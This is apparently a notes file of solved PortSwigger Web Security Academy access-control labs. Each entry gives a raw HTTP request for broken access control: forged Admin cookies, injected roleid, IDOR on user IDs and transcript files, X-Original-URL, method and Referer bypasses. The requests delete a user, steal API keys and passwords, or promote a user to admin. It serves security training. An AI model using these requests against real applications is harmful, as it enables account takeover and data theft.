##### Unprotected admin functionality – delete `carlos` via hidden admin endpoint
```http
GET /administrator-panel/delete?username=carlos HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
```
Context: The `/administrator-panel` interface is exposed without any authentication or authorization checks. After discovering it via `robots.txt`, simply issuing a request to the delete endpoint removes the user `carlos`.
Encoding: None
Source: [[1. Unprotected admin functionality]]
---
##### Unprotected admin functionality with unpredictable URL – endpoint discovered via application JavaScript
```http
GET /<admin-path-from-js>/delete?username=carlos HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
```
Context: The admin panel URL is exposed client-side in the site's JavaScript source. No authentication or authorization is enforced on this hidden endpoint, allowing direct user deletion.
Encoding: None
Source: [[2. Unprotected admin functionality with unpredictable URL]]
---
##### User role controlled by request parameter – forge `Admin` cookie to delete `carlos`
```http
GET /admin/delete?username=carlos HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR_SESSION_ID; Admin=true
```
Context: The application determines admin privileges purely from the `Admin` cookie value. By intercepting the login response, changing `Admin=false` to `Admin=true`, and then requesting the delete endpoint, you can remove user `carlos`.
Encoding: None
Source: [[3. User role controlled by request parameter]]
---
##### User role modification via profile update – forge `roleid` to gain admin and delete `carlos`
```http
POST /my-account HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/json
Cookie: session=YOUR_SESSION_COOKIE
{"email":"
[email protected]","roleid":2}
```
Context: The profile update endpoint accepts a JSON body including `roleid`. By adding `"roleid":2`, you elevate your privileges to admin.
Encoding: None
Source: [[4. User role can be modified in user profile]]
---
##### User ID controlled by request parameter – horizontal privilege escalation
```http
GET /my-account?id=carlos HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR_SESSION_COOKIE
```
Context: The `id` parameter in the `/my-account` endpoint determines which user’s details are shown, without any authorization check. By changing `id` from your own username to `carlos`, you retrieve his API key.
Encoding: None
Source: [[5. User ID controlled by request parameter]]
##### User ID controlled by request parameter – horizontal privilege escalation via GUID
```http
GET /my-account?id=GUID-OF-CARLOS HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR_SESSION_COOKIE
```
Context: The `id` parameter on the account page is used to fetch user details without any authorization check. By substituting your own GUID with Carlos’s GUID—discovered from one of his blog-post URLs—you can view his account and retrieve his API key.
Encoding: None
Source: [[6. User ID controlled by request parameter, with unpredictable user IDs]]
---
##### User ID controlled by request parameter with data leakage in redirect – leak API key in redirect response
```http
GET /my-account?id=carlos HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR_SESSION_COOKIE
```
Context: The `id` parameter on `/my-account` is not access-controlled. When set to `carlos`, the server redirects you (3xx) but includes Carlos’s API key in the **response body** of the redirect.
Encoding: None
Source: [[7. User ID controlled by request parameter with data leakage in redirect]]
---
##### Admin password disclosure via user ID manipulation
```http
GET /my-account?id=administrator HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR_SESSION_COOKIE
```
Context: The `/my-account` page pre-fills the password field with the current user’s actual password. By changing the `id` parameter to `administrator`, you retrieve the admin’s password from the HTML response.
Encoding: None
Source: [[8. User ID controlled by request parameter with password disclosure]]
---
##### Insecure direct object references – retrieve chat transcript to steal password
```http
GET /transcript?filename=1.txt HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR_SESSION_COOKIE
```
Context: Chat transcripts are stored as static text files with predictable, incrementing filenames. By changing the `filename` parameter to `1.txt`, you access Carlos’s transcript, which contains his password.
Encoding: None
Source: [[9. Insecure direct object references]]
---
##### URL-based access control bypass via `X-Original-URL` – delete `carlos`
```http
GET /?username=carlos HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
X-Original-URL: /admin/delete
```
Context: A front-end proxy blocks direct access to `/admin`, but the backend framework honors the `X-Original-URL` header. By setting the real request to `/` with `?username=carlos` and overriding the path to `/admin/delete`, the `carlos` user is removed.
Encoding: None
Source: [[10. URL-based access control can be circumvented]]
---
##### Method-based access control bypass via GET
```http
GET /admin-roles?username=wiener&action=promote HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR_SESSION_COOKIE
```
Context: The `/admin-roles` endpoint enforces authorization only on `POST` requests. By switching to a `GET` request, the server processes the same action without checking your admin privileges, allowing you to elevate `wiener` to administrator.
Encoding: None
Source: [[11. Method-based access control can be circumvented]]
----
##### Broken multi-step process – bypass missing auth on confirm step
```http
POST /admin-roles/confirm HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Cookie: session=NON-ADMIN-SESSION
username=wiener&action=promote
```
Context: The first promotion step enforces admin-only checks, but the **confirmation endpoint** (`/admin-roles/confirm`) does **not** revalidate privileges. By replaying the saved request with a non-admin session cookie and your own username, you complete the promotion.
Encoding: None
Source: [[12. Multi-step process with no access control on one step]]
---
##### Referer-based access control bypass – promote user via spoofed `Referer`
```http
GET /admin-roles?username=wiener&action=upgrade HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Referer: https://YOUR-LAB-ID.web-security-academy.net/admin
Cookie: session=YOUR_LOW_PRIVILEGE_SESSION
```
Context: The `/admin-roles` endpoint authorizes admin actions solely by checking that the `Referer` header contains `/admin`. By replaying the request with a non-admin session and spoofing `Referer: https://…/admin`, you bypass the flawed check and successfully upgrade `wiener` to administrator.
Encoding: None
Source: [[13. Referer-based access control]]